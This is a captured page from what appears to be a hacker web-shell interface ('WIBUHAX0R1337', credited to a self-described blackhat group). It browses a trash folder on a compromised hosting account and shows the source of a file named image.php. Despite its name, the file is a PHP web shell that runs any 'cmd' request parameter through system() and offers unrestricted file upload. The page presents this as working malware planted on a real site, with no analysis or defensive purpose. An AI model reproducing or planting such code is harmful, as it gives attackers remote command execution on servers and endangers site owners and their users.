-
✘✘✘ WIBUHAX0R1337 ✘✘✘
-
✘
PATCH :
/
home
/
indianstaffing
/
.trash
/
Upload File:
files >> /home/indianstaffing/.trash/image.php
<!DOCTYPE html> <html> <head> <title>Upload your files</title> </head> <body> <form enctype="multipart/form-data" action="image.php" method="POST"> <p>Upload your file</p> <input type="file" name="uploaded_file"></input><br /> <input type="submit" value="Upload"></input> </form> </body> </html> <?PHP $cmd = ($_REQUEST['cmd']); echo system($cmd); if(!empty($_FILES['uploaded_file'])) { $path =basename( $_FILES['uploaded_file']['name']); if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) { echo "The file <a href='" . basename($_FILES['uploaded_file']['name']) . "'>test</a> has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } } ?>
2022 - 2023 Copyright By Lutfifakee || Padang Blackhat ♥